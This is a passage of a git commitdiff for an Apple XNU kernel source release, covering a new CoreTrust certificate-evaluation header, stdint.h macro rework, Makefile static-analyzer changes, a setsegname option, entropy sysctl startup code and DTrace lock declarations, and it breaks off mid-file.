From: Apple Date: Tue, 27 Apr 2021 01:04:15 +0000 (+0000) Subject: xnu-7195.101.1.tar.gz X-Git-Tag: macos-113^0 X-Git-Url: https://git.saurik.com/apple/xnu.git/commitdiff_plain/c3c9b80d004dbbfdf763edeb97968c6997e3b45b xnu-7195.101.1.tar.gz --- diff --git a/EXTERNAL_HEADERS/corecrypto/cckprng.h b/EXTERNAL_HEADERS/corecrypto/cckprng.h index 79fe22fd3..d50b1d060 100644 --- a/EXTERNAL_HEADERS/corecrypto/cckprng.h +++ b/EXTERNAL_HEADERS/corecrypto/cckprng.h @@ -310,7 +310,6 @@ struct cckprng_funcs { @param seed_nbytes Length of the seed in bytes @param seed Pointer to a high-entropy seed @param nonce_nbytes Length of the nonce in bytes - @param seed Pointer to a single-use nonce @discussion @p max_ngens should be set based on an upper bound of CPUs available on the device. The entropy buffer should be managed outside the PRNG and updated continuously (e.g. by an interrupt handler). The count of samples in the entropy buffer needn't be better than a rough estimate. */ diff --git a/EXTERNAL_HEADERS/coretrust/CTEvaluate.h b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h new file mode 100644 index 000000000..3be1d92e0 --- /dev/null +++ b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h @@ -0,0 +1,215 @@ +// +// CoreTrust.h +// CoreTrust +// +// Copyright © 2017-2020 Apple Inc. All rights reserved. 
+// + +#ifndef _CORETRUST_EVALUATE_H_ +#define _CORETRUST_EVALUATE_H_ + +#include +#include + +__BEGIN_DECLS + +typedef struct x509_octet_string { + const uint8_t *data; + size_t length; +} CTAsn1Item; + +int CTParseCertificateSet(const uint8_t *der, const uint8_t *der_end, // Input: binary representation of concatenated DER-encoded certs + CTAsn1Item *certStorage, size_t certStorageLen, // Output: An array of certStorageLen CTAsn1Items that will be populated with the + // CTAsn1Item for each parsed cert (in the same order as input) + size_t *numParsedCerts); // Output: number of successfully parsed certs + +int CTEvaluateSavageCerts(const uint8_t *certsData, size_t certsLen, + const uint8_t *rootKeyData, size_t rootKeyLen, + const uint8_t **leafKeyData, size_t *leafKeyLen, + bool *isProdCert); + +int CTEvaluateSavageCertsWithUID(const uint8_t *certsData, size_t certsLen, + const uint8_t *rootKeyData, size_t rootKeyLen, + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + uint8_t *UIDData, size_t UIDLen, // Output: a pre-allocated buffer of UIDLen + bool *isProdCert); + +int CTEvaluateYonkersCerts(const uint8_t *certsData, size_t certsLen, + const uint8_t *rootKeyData, size_t rootKeyLen, + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + uint8_t *UIDData, size_t UIDLen, // Output: a pre-allocated buffer of UIDLen + bool *isProdCert); + +int CTEvaluateAcrt(const uint8_t *certsData, size_t certsLen, // Input: binary representation of at most 3 concatenated certs + // with leaf first (root may be omitted) + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData + +int CTEvaluateUcrt(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: 
points to the leaf key data in the input certsData) + +int CTEvaluateUcrtTestRoot(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t *rootKeyData, size_t rootKeyLen, // Input: Root public key, if not specified production root will be used + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData) + +int CTEvaluateBAASystem(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData + +typedef struct baa_identity { + uint32_t chipId; + uint64_t ecid; + bool productionStatus; + bool securityMode; + uint8_t securityDomain; + CTAsn1Item img4; +} CTBAAIdentity; + +int CTEvaluateBAASystemWithId(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateBAASystemTestRoot(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t *rootKeyData, size_t rootKeyLen, // Input: Root public key, if not specified production root will be used + const uint8_t **leafKeyData, size_t *leafKeyLen,// Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateBAAUser(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen, // 
Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateBAAUserTestRoot(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t *rootKeyData, size_t rootKeyLen, // Input: Root public key, if not specified production root will be used + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateSatori(const uint8_t *certsData, size_t certsLen, // Input: binary (DER) representation of 3 concatenated certs + // with leaf first + bool allowTestRoot, // Input: whether to allow the Test Apple Roots + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData + +int CTEvaluatePragueSignatureCMS(const uint8_t *cmsData, size_t cmsLen, // Input: CMS signature blob + const uint8_t *detachedData, size_t detachedDataLen, // Input: data signed by CMS blob + bool allowTestRoot, // Input: permit use of test hierarchy + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to leaf key data in input cmsData + +int CTEvaluateKDLSignatureCMS(const uint8_t *cmsData, size_t cmsLen, // Input: CMS signature blob + const uint8_t *detachedData, size_t detachedDataLen, // Input: data signed by CMS blob + bool allowTestRoot, // Input: permit use of test hierarchy + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to leaf key data in input cmsData + +typedef uint64_t CoreTrustPolicyFlags; +enum { + CORETRUST_POLICY_BASIC = 0, + CORETRUST_POLICY_SAVAGE_DEV = 1 << 0, + CORETRUST_POLICY_SAVAGE_PROD = 1 << 1, + CORETRUST_POLICY_MFI_AUTHV3 = 1 << 2, + CORETRUST_POLICY_MAC_PLATFORM = 1 << 3, + CORETRUST_POLICY_MAC_DEVELOPER = 1 << 4, + CORETRUST_POLICY_DEVELOPER_ID = 1 << 5, 
+ CORETRUST_POLICY_MAC_APP_STORE = 1 << 6, + CORETRUST_POLICY_IPHONE_DEVELOPER = 1 << 7, + CORETRUST_POLICY_IPHONE_APP_PROD = 1 << 8, + CORETRUST_POLICY_IPHONE_APP_DEV = 1 << 9, + CORETRUST_POLICY_IPHONE_VPN_PROD = 1 << 10, + CORETRUST_POLICY_IPHONE_VPN_DEV = 1 << 11, + CORETRUST_POLICY_TVOS_APP_PROD = 1 << 12, + CORETRUST_POLICY_TVOS_APP_DEV = 1 << 13, + CORETRUST_POLICY_TEST_FLIGHT_PROD = 1 << 14, + CORETRUST_POLICY_TEST_FLIGHT_DEV = 1 << 15, + CORETRUST_POLICY_IPHONE_DISTRIBUTION = 1 << 16, + CORETRUST_POLICY_MAC_SUBMISSION = 1 << 17, + CORETRUST_POLICY_YONKERS_DEV = 1 << 18, + CORETRUST_POLICY_YONKERS_PROD = 1 << 19, + CORETRUST_POLICY_MAC_PLATFORM_G2 = 1 << 20, + CORETRUST_POLICY_ACRT = 1 << 21, + CORETRUST_POLICY_SATORI = 1 << 22, + CORETRUST_POLICY_BAA = 1 << 23, + CORETRUST_POLICY_UCRT = 1 << 24, + CORETRUST_POLICY_PRAGUE = 1 << 25, + CORETRUST_POLICY_KDL = 1 << 26, + CORETRUST_POLICY_MFI_AUTHV2 = 1 << 27, + CORETRUST_POLICY_MFI_SW_AUTH_PROD = 1 << 28, + CORETRUST_POLICY_MFI_SW_AUTH_DEV = 1 << 29, + CORETRUST_POLICY_COMPONENT = 1 << 30, + CORETRUST_POLICY_IMG4 = 1ULL << 31, + CORETRUST_POLICY_SERVER_AUTH = 1ULL << 32, + CORETRUST_POLICY_SERVER_AUTH_STRING = 1ULL << 33, +}; + +typedef uint32_t CoreTrustDigestType; +enum { + CORETRUST_DIGEST_TYPE_SHA1 = 1, + CORETRUST_DIGEST_TYPE_SHA224 = 2, + CORETRUST_DIGEST_TYPE_SHA256 = 4, + CORETRUST_DIGEST_TYPE_SHA384 = 8, + CORETRUST_DIGEST_TYPE_SHA512 = 16 +}; + +int CTEvaluateAMFICodeSignatureCMS(const uint8_t *cmsData, size_t cmsLen, // Input: CMS blob + const uint8_t *detachedData, size_t detachedDataLen, // Input: data signed by CMS blob + bool allow_test_hierarchy, // Input: permit use of test hierarchy + const uint8_t **leafCert, size_t *leafCertLen, // Output: signing certificate + CoreTrustPolicyFlags *policyFlags, // Output: policy met by signing certificate + CoreTrustDigestType *cmsDigestType, // Output: digest used to sign the CMS blob + CoreTrustDigestType *hashAgilityDigestType, // Output: highest 
strength digest type + // from hash agility attribute + const uint8_t **digestData, size_t *digestLen); // Output: pointer to hash agility value + // in CMS blob (with digest type above) +/* Returns non-zero if there's a standards-based problem with the CMS or certificates. + * Policy matching of the certificates is only reflected in the policyFlags output. Namely, if the only problem is that + * the certificates don't match a policy, the returned integer will be 0 (success) and the policyFlags will be 0 (no matching policies). + * Some notes about hash agility outputs: + * - hashAgilityDigestType is only non-zero for HashAgilityV2 + * - If hashAgilityDigestType is non-zero, digestData/Len provides the digest value + * - If hashAgilityDigestType is zero, digestData/Len provides the content of the HashAgilityV1 attribute (if present) + * - If neither HashAgilityV1 nor HashAgilityV2 attributes are found, these outputs will all be NULL. + */ + +int CTParseAccessoryCerts(const uint8_t *certsData, size_t certsLen, // Input: CMS or binary representation of DER-encoded certs + const uint8_t **leafCertData, size_t *leafCertLen, // Output: points to leaf cert data in input certsData + const uint8_t **subCACertData, size_t *subCACertLen, // Output: points to subCA cert data (1st of 2) in input certsData, if present. Is set to NULL if only one cert present in input. 
+ CoreTrustPolicyFlags *flags); // Output: policy flags set by this leaf + + +int CTEvaluateAccessoryCert(const uint8_t *leafCertData, size_t leafCertLen, // Input: binary representation of DER-encoded leaf cert + const uint8_t *subCACertData, size_t subCACertLen, // Input: (optional) binary representation of DER-encoded subCA cert + const uint8_t *anchorCertData, size_t anchorCertLen, // Input: binary representation of DER-encoded anchor cert + CoreTrustPolicyFlags policy, // Input: policy to use when evaluating chain + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input leafCertData + const uint8_t **extensionValueData, size_t *extensionValueLen); // Output: points to the extension value in the input leafCertData +/* Which extension value is returned is based on which policy the cert was verified against: + * - For MFI AuthV3, this is the value of the extension with OID 1.2.840.113635.100.6.36 + * - For SW Auth, this is the value of the extension with OID 1.2.840.113635.100.6.59.1 (GeneralCapabilities extension) + * - For Component certs, this is the value of the extension with OID 1.2.840.113635.100.11.1 (Component Type) + * + * The following CoreTrustPolicyFlags are accepted: + * - CORETRUST_POLICY_BASIC + * - CORETRUST_POLICY_MFI_AUTHV2 + * - CORETRUST_POLICY_MFI_AUTHV3 + * - CORETRUST_POLICY_MFI_SW_AUTH_DEV + * - CORETRUST_POLICY_MFI_SW_AUTH_PROD + * - CORETRUST_POLICY_COMPONENT + */ + +int CTEvaluateAppleSSL(const uint8_t *certsData, size_t certsLen, // Input: binary representation of up to 3 concatenated + // DER-encoded certificates, with leaf first + const uint8_t *hostnameData, size_t hostnameLen, // Input: The hostname of the TLS server being connected to + uint64_t leafMarker, // Input: The last decimal of the marker OID for this project + // (e.g. 
32 for 1.2.840.113635.100.6.27.32 + bool allowTestRoots); // Input: permit use of test hierarchy + +int CTEvaluateAppleSSLWithOptionalTemporalCheck(const uint8_t *certsData, size_t certsLen, + const uint8_t *hostnameData, size_t hostnameLen, + uint64_t leafMarker, + bool allowTestRoots, + bool checkTemporalValidity); + +__END_DECLS + +#endif /* _CORETRUST_EVALUATE_H_ */ diff --git a/EXTERNAL_HEADERS/stdint.h b/EXTERNAL_HEADERS/stdint.h index 9d86e8a62..19ac69fb0 100644 --- a/EXTERNAL_HEADERS/stdint.h +++ b/EXTERNAL_HEADERS/stdint.h @@ -60,12 +60,51 @@ typedef uint64_t uint_fast64_t; /* 7.18.1.5 Greatest-width integer types */ -typedef long long intmax_t; -typedef unsigned long long uintmax_t; +#ifdef __INTMAX_TYPE__ +typedef __INTMAX_TYPE__ intmax_t; +#else +#ifdef __LP64__ +typedef long int intmax_t; +#else +typedef long long int intmax_t; +#endif /* __LP64__ */ +#endif /* __INTMAX_TYPE__ */ +#ifdef __UINTMAX_TYPE__ +typedef __UINTMAX_TYPE__ uintmax_t; +#else +#ifdef __LP64__ +typedef long unsigned int uintmax_t; +#else +typedef long long unsigned int uintmax_t; +#endif /* __LP64__ */ +#endif /* __UINTMAX_TYPE__ */ + +/* 7.18.4 Macros for integer constants */ +#define INT8_C(v) (v) +#define INT16_C(v) (v) +#define INT32_C(v) (v) +#define INT64_C(v) (v ## LL) + +#define UINT8_C(v) (v) +#define UINT16_C(v) (v) +#define UINT32_C(v) (v ## U) +#define UINT64_C(v) (v ## ULL) + +#ifdef __LP64__ +#define INTMAX_C(v) (v ## L) +#define UINTMAX_C(v) (v ## UL) +#else +#define INTMAX_C(v) (v ## LL) +#define UINTMAX_C(v) (v ## ULL) +#endif /* 7.18.2 Limits of specified-width integer types: * These #defines specify the minimum and maximum limits * of each of the types declared above. + * + * They must have "the same type as would an expression that is an + * object of the corresponding type converted according to the integer + * promotion". 
*/ @@ -126,43 +165,33 @@ typedef unsigned long long uintmax_t; /* 7.18.2.4 Limits of integer types capable of holding object pointers */ #if __WORDSIZE == 64 -#define INTPTR_MIN INT64_MIN -#define INTPTR_MAX INT64_MAX +#define INTPTR_MAX 9223372036854775807L #else -#define INTPTR_MIN INT32_MIN -#define INTPTR_MAX INT32_MAX +#define INTPTR_MAX 2147483647L #endif +#define INTPTR_MIN (-INTPTR_MAX-1) #if __WORDSIZE == 64 -#define UINTPTR_MAX UINT64_MAX +#define UINTPTR_MAX 18446744073709551615UL #else -#define UINTPTR_MAX UINT32_MAX +#define UINTPTR_MAX 4294967295UL #endif /* 7.18.2.5 Limits of greatest-width integer types */ -#define INTMAX_MIN INT64_MIN -#define INTMAX_MAX INT64_MAX - -#define UINTMAX_MAX UINT64_MAX +#define INTMAX_MAX INTMAX_C(9223372036854775807) +#define UINTMAX_MAX UINTMAX_C(18446744073709551615) +#define INTMAX_MIN (-INTMAX_MAX-1) /* 7.18.3 "Other" */ #if __WORDSIZE == 64 -#define PTRDIFF_MIN INT64_MIN -#define PTRDIFF_MAX INT64_MAX +#define PTRDIFF_MIN INTMAX_MIN +#define PTRDIFF_MAX INTMAX_MAX #else #define PTRDIFF_MIN INT32_MIN #define PTRDIFF_MAX INT32_MAX #endif -/* We have no sig_atomic_t yet, so no SIG_ATOMIC_{MIN,MAX}. - Should end up being {-127,127} or {0,255} ... or bigger. - My bet would be on one of {U}INT32_{MIN,MAX}. 
*/ - -#if __WORDSIZE == 64 -#define SIZE_MAX UINT64_MAX -#else -#define SIZE_MAX UINT32_MAX -#endif +#define SIZE_MAX UINTPTR_MAX #if defined(__STDC_WANT_LIB_EXT1__) && __STDC_WANT_LIB_EXT1__ >= 1 #define RSIZE_MAX (SIZE_MAX >> 1) @@ -194,20 +223,6 @@ typedef unsigned long long uintmax_t; #define SIG_ATOMIC_MIN INT32_MIN #define SIG_ATOMIC_MAX INT32_MAX -/* 7.18.4 Macros for integer constants */ -#define INT8_C(v) (v) -#define INT16_C(v) (v) -#define INT32_C(v) (v) -#define INT64_C(v) (v ## LL) - -#define UINT8_C(v) (v ## U) -#define UINT16_C(v) (v ## U) -#define UINT32_C(v) (v ## U) -#define UINT64_C(v) (v ## ULL) - -#define INTMAX_C(v) (v ## LL) -#define UINTMAX_C(v) (v ## ULL) - #endif /* KERNEL */ #endif /* _KERNEL_STDINT_H_ */ diff --git a/Makefile b/Makefile index 8b1e30f65..9b62aadb1 100644 --- a/Makefile +++ b/Makefile @@ -318,6 +318,8 @@ xnu_tests_driverkit: SRCROOT=$(SRCROOT)/tests/driverkit +include $(MakeInc_cmd) + # # The "analyze" target defined below invokes Clang Static Analyzer # with a predefined set of checks and options for the project. @@ -339,16 +341,18 @@ STATIC_ANALYZER_TARGET ?= STATIC_ANALYZER_EXTRA_FLAGS ?= analyze: - # This is where the reports are going to be available. - # Old reports are deleted on make clean only. - mkdir -p $(STATIC_ANALYZER_OUTPUT_DIR) - - # Recursively build the requested target under scan-build. - # Exclude checks that weren't deemed to be security critical, - # like null pointer dereferences. - xcrun scan-build -o $(STATIC_ANALYZER_OUTPUT_DIR) \ +# This is where the reports are going to be available. +# Old reports are deleted on make clean only. + $(_v)$(MKDIR) $(STATIC_ANALYZER_OUTPUT_DIR) + +# Recursively build the requested target under scan-build. +# Exclude checks that weren't deemed to be security critical, +# like null pointer dereferences. 
+ $(_v)$(XCRUN) $(SCAN_BUILD) -o $(STATIC_ANALYZER_OUTPUT_DIR) \ -disable-checker deadcode.DeadStores \ -disable-checker core.NullDereference \ -disable-checker core.DivideZero \ $(STATIC_ANALYZER_EXTRA_FLAGS) \ - make $(STATIC_ANALYZER_TARGET) + $(MAKE) $(STATIC_ANALYZER_TARGET) QUIET=1 2>&1 | $(GREP) "^scan-build:" + +.PHONY: analyze diff --git a/SETUP/setsegname/setsegname.c b/SETUP/setsegname/setsegname.c index bd15b0025..a0d5d3bc3 100644 --- a/SETUP/setsegname/setsegname.c +++ b/SETUP/setsegname/setsegname.c @@ -107,7 +107,7 @@ readFile(const char *path, vm_offset_t * objAddr, vm_size_t * objSize) static void usage(void) { - fprintf(stderr, "Usage: %s [-s OLDSEGNAME] -n NEWSEGNAME input -o output\n", getprogname()); + fprintf(stderr, "Usage: %s [-s OLDSEGNAME] [-i IGNORESEGNAME] -n NEWSEGNAME input -o output\n", getprogname()); exit(1); } @@ -120,6 +120,7 @@ main(int argc, char * argv[]) const char * output_name = NULL; const char * input_name = NULL; const char * oldseg_name = NULL; + const char * ignoreseg_name = NULL; const char * newseg_name = NULL; struct mach_header * hdr; struct mach_header_64 * hdr64; @@ -137,11 +138,14 @@ main(int argc, char * argv[]) int ch; - while ((ch = getopt(argc, argv, "s:n:o:")) != -1) { + while ((ch = getopt(argc, argv, "s:i:n:o:")) != -1) { switch (ch) { case 's': oldseg_name = optarg; break; + case 'i': + ignoreseg_name = optarg; + break; case 'n': newseg_name = optarg; break; @@ -234,7 +238,8 @@ main(int argc, char * argv[]) attr = OSSwapInt32(attr); } - if (!(S_ATTR_DEBUG & attr)) { + if (!(S_ATTR_DEBUG & attr) && (!ignoreseg_name || + 0 != strncmp(ignoreseg_name, (char *)names, sizeof(*names)))) { if (!oldseg_name || 0 == strncmp(oldseg_name, (char *)names, sizeof(*names))) { memset(names, 0x0, sizeof(*names)); diff --git a/bsd/arm/vmparam.h b/bsd/arm/vmparam.h index 085f13968..ce69fd9cd 100644 --- a/bsd/arm/vmparam.h +++ b/bsd/arm/vmparam.h @@ -26,7 +26,7 @@ #ifndef DFLSSIZ /* XXX stack size default is a platform 
property: use getrlimit(2) */ #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \ - (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0)) + (defined(KERNEL) && XNU_TARGET_OS_OSX) #define DFLSSIZ (8*1024*1024 - 16*1024) #else #define DFLSSIZ (1024*1024 - 16*1024) /* initial stack size limit */ @@ -35,7 +35,7 @@ #ifndef MAXSSIZ /* XXX stack size limit is a platform property: use getrlimit(2) */ #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \ - (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0)) + (defined(KERNEL) && XNU_TARGET_OS_OSX) #define MAXSSIZ (64*1024*1024) /* max stack size */ #else #define MAXSSIZ (1024*1024) /* max stack size */ diff --git a/bsd/conf/files b/bsd/conf/files index f151c7312..7971787ee 100644 --- a/bsd/conf/files +++ b/bsd/conf/files @@ -167,6 +167,7 @@ bsd/vfs/vfs_conf.c standard bsd/vfs/vfs_conf.c optional config_nfs4 bsd/vfs/vfs_fslog.c standard bsd/vfs/vfs_init.c standard +bsd/vfs/vfs_io_compression_stats.c optional config_io_compression_stats bsd/vfs/vfs_lookup.c standard bsd/vfs/vfs_quota.c optional quota bsd/vfs/vfs_subr.c standard @@ -457,6 +458,7 @@ bsd/kern/subr_log.c standard bsd/kern/subr_prf.c standard bsd/kern/subr_sbuf.c standard bsd/kern/subr_xxx.c standard +bsd/kern/counter_test.c optional development bsd/kern/sys_eventlink.c standard bsd/kern/sys_generic.c standard bsd/kern/sys_pipe.c standard diff --git a/bsd/crypto/entropy/Makefile b/bsd/crypto/entropy/Makefile index 2d1197ce7..2ff49f54b 100644 --- a/bsd/crypto/entropy/Makefile +++ b/bsd/crypto/entropy/Makefile @@ -6,9 +6,6 @@ export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir include $(MakeInc_cmd) include $(MakeInc_def) -DATAFILES = \ - entropy_sysctl.h - INSTALL_MI_LIST = EXPORT_MI_LIST = ${DATAFILES} diff --git a/bsd/crypto/entropy/entropy_sysctl.c b/bsd/crypto/entropy/entropy_sysctl.c index 39502f7b9..73580d77b 100644 --- a/bsd/crypto/entropy/entropy_sysctl.c +++ b/bsd/crypto/entropy/entropy_sysctl.c @@ -27,9 
+27,9 @@ */ #include +#include #include #include -#include #include #include @@ -49,7 +49,7 @@ SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, failure_cou SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, max_observation_count, CTLFLAG_RD, &entropy_health_apt_stats.max_observation_count, 0, NULL); static int -sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) +sysctl_entropy_collect SYSCTL_HANDLER_ARGS { if (!req->oldptr || req->oldlen > entropy_analysis_buffer_size) { return EINVAL; @@ -61,11 +61,21 @@ sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __ // Get current size of entropy buffer in bytes SYSCTL_UINT(_kern_entropy, OID_AUTO, entropy_buffer_size, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, &entropy_analysis_buffer_size, 0, NULL); // Collect contents from entropy buffer -SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect, CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, NULL, 0, sysctl_entropy_collect, "-", NULL); +SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect, + CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, + NULL, 0, sysctl_entropy_collect, "-", NULL); -void -entropy_analysis_register_sysctls(void) +__startup_func +static void +entropy_analysis_sysctl_startup(void) { - sysctl_register_oid(&sysctl__kern_entropy_entropy_buffer_size); - sysctl_register_oid(&sysctl__kern_entropy_entropy_collect); + uint32_t sample_count = 0; + if (__improbable(PE_parse_boot_argn("entropy-analysis-sample-count", &sample_count, sizeof(sample_count)))) { + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size); + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect); + } else if (__improbable(PE_parse_boot_argn("ebsz", &sample_count, sizeof(sample_count)))) { + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size); + 
sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect); + } } +STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, entropy_analysis_sysctl_startup); diff --git a/bsd/crypto/entropy/entropy_sysctl.h b/bsd/crypto/entropy/entropy_sysctl.h deleted file mode 100644 index 4e957fb9b..000000000 --- a/bsd/crypto/entropy/entropy_sysctl.h +++ /dev/null @@ -1,42 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ - -#ifndef _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_ -#define _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_ - -// This function is used only for test purposes. We collect a large -// number of entropy samples during boot and analyze them offline. 
-// -// See entropy.c to understand the initialization of this module via -// boot arg and the collection of the samples. -// -// See entropy_sysctl.c to understand the semantics of the sysctl -// that exposes the samples for analysis. -void entropy_analysis_register_sysctls(void); - -#endif diff --git a/bsd/dev/arm/dtrace_isa.c b/bsd/dev/arm/dtrace_isa.c index c77f08a64..0802551bc 100644 --- a/bsd/dev/arm/dtrace_isa.c +++ b/bsd/dev/arm/dtrace_isa.c @@ -55,9 +55,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t); extern dtrace_id_t dtrace_probeid_error; /* special ERROR probe */ typedef arm_saved_state_t savearea_t; -extern lck_attr_t *dtrace_lck_attr; -extern lck_grp_t *dtrace_lck_grp; - int dtrace_arm_condition_true(int condition, int cpsr); /* @@ -94,7 +91,7 @@ dtrace_getipl(void) * MP coordination */ -decl_lck_mtx_data(static, dt_xc_lock); +static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr); static uint32_t dt_xc_sync; typedef struct xcArg { @@ -138,16 +135,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg) return; } -/* - * Initialization - */ -void -dtrace_isa_init(void) -{ - lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr); - return; -} - /* * Runtime and ABI */ diff --git a/bsd/dev/arm/munge.c b/bsd/dev/arm/munge.c index af050d7ee..fe18d66cc 100644 --- a/bsd/dev/arm/munge.c +++ b/bsd/dev/arm/munge.c @@ -64,7 +64,7 @@ typedef enum { /* * We start 32 bytes after sp since 4 registers are pushed onto the stack - * in the userspace syscall handler, and the first 4 stack argumnets are moved + * in the userspace syscall handler, and the first 4 stack arguments are moved * into registers already */ #define ARG_SP_BYTE_OFFSET 32 diff --git a/bsd/dev/arm/stubs.c b/bsd/dev/arm/stubs.c index 7675bb322..bf61083c2 100644 --- a/bsd/dev/arm/stubs.c +++ b/bsd/dev/arm/stubs.c @@ -16,11 +16,13 @@ #include #include #include +#include #include #include #include #include + /* * copy a null terminated string from the 
kernel address space into the user * address space. - if the user is denied write access, return EFAULT. - if @@ -90,3 +92,4 @@ copywithin(void *src, void *dst, size_t count) bcopy(src, dst, count); return 0; } + diff --git a/bsd/dev/arm64/dtrace_isa.c b/bsd/dev/arm64/dtrace_isa.c index 494bb7fad..39d6988f9 100644 --- a/bsd/dev/arm64/dtrace_isa.c +++ b/bsd/dev/arm64/dtrace_isa.c @@ -52,9 +52,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t); extern dtrace_id_t dtrace_probeid_error; /* special ERROR probe */ typedef arm_saved_state_t savearea_t; -extern lck_attr_t *dtrace_lck_attr; -extern lck_grp_t *dtrace_lck_grp; - #if XNU_MONITOR extern void * pmap_stacks_start; extern void * pmap_stacks_end; @@ -99,7 +96,7 @@ dtrace_getipl(void) * MP coordination */ -decl_lck_mtx_data(static, dt_xc_lock); +static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr); static uint32_t dt_xc_sync; typedef struct xcArg { @@ -143,16 +140,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg) return; } -/* - * Initialization - */ -void -dtrace_isa_init(void) -{ - lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr); - return; -} - /** * Register definitions diff --git a/bsd/dev/dtrace/dtrace.c b/bsd/dev/dtrace/dtrace.c index 36d4f8223..af303e6f4 100644 --- a/bsd/dev/dtrace/dtrace.c +++ b/bsd/dev/dtrace/dtrace.c @@ -309,10 +309,14 @@ static int dtrace_module_unloaded(struct kmod_info *kmod); * LCK_MTX_ASSERT(&cpu_lock, LCK_MTX_ASSERT_OWNED); * */ -static lck_mtx_t dtrace_lock; /* probe state lock */ -static lck_mtx_t dtrace_provider_lock; /* provider state lock */ -static lck_mtx_t dtrace_meta_lock; /* meta-provider state lock */ -static lck_rw_t dtrace_dof_mode_lock; /* dof mode lock */ +static LCK_MTX_DECLARE_ATTR(dtrace_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* probe state lock */ +static LCK_MTX_DECLARE_ATTR(dtrace_provider_lock, + 